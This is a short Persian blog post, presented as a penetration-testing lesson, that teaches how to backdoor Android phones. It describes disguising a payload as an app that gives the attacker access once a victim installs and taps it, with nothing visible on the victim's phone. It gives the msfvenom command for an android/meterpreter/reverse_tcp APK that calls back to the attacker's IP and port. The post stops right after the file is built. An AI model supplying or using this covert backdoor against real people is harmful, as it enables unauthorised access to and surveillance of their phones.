سلام خدمت همه علاقمندان به تست نفوذ طبق درخواست کاربران قرار شد مطالبی راجب تست نفوذ قرار دهیم.
این سری اموزش هک یا در واقع بکدور اندروید صحبت کنیم.
هک به این صورت است که ما یک پیلود(کدی که در سیستم فرد مقابل اجرا میشود و به ما دسترسی میدهد)میسازیم که بصورت فایل apk برنامه های اندرویدی هستش و به محض اینکه فرد مقابل برنامه را نصب و روی ان کلیک کند اتفاق خاصی در گوشی او نمی افتد ولی در سیستم ما هک شده است
چندتا مطلب رو بگم که مقدمه این هک هست اگر میخواید واقعا خودرا هکر بردانید باید بفهمید کدی که مینویسید چه کاری انجام میدهد.
ما دراین اموزش از سیستم عامل کالی لینوکس و فریمورک قدرتمند متاسپلویت استقاده میکنیم
یه سری مفهوم رو باید برای انواع حملات و هک ها بلد باشید که عبارت است از:
LHOST = ای پی سیستم خودمون که در وبلاگ نحوه بدست اوردنش رو اموزش دادم:اینم لینکش:
http://mrtrojan.blog.ir/post/ip_linux
LPORT = یک پورت (درگاه های ورودی و خروجی اطلاعات) دلخواه سیستم خودمون.4444 یا 444 خوبه.
RHOST= ای پی سیستم فرد مقابل.
RPORT=پورت های باز در سیستم فرد مقابلاینهم ۴۴۴۴ یا ۴۴۴ خوبه.
ما در این اموزش فقط به LHOST و LPORT احتیاج داریم.
با دستور msfvenom ه یک فایل مخرب میسازه شروع میکنیم.
این دستورات را در ترمینال کالی یا بک ترک بنویسید
msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 o>filename.apk
فقط بجای قسمت yor ip ای پی خودتون و به جای filename اسم فایلی که میخواید بسازه رو بنویسید.
خب فایل رو ساخت
درباره این سایت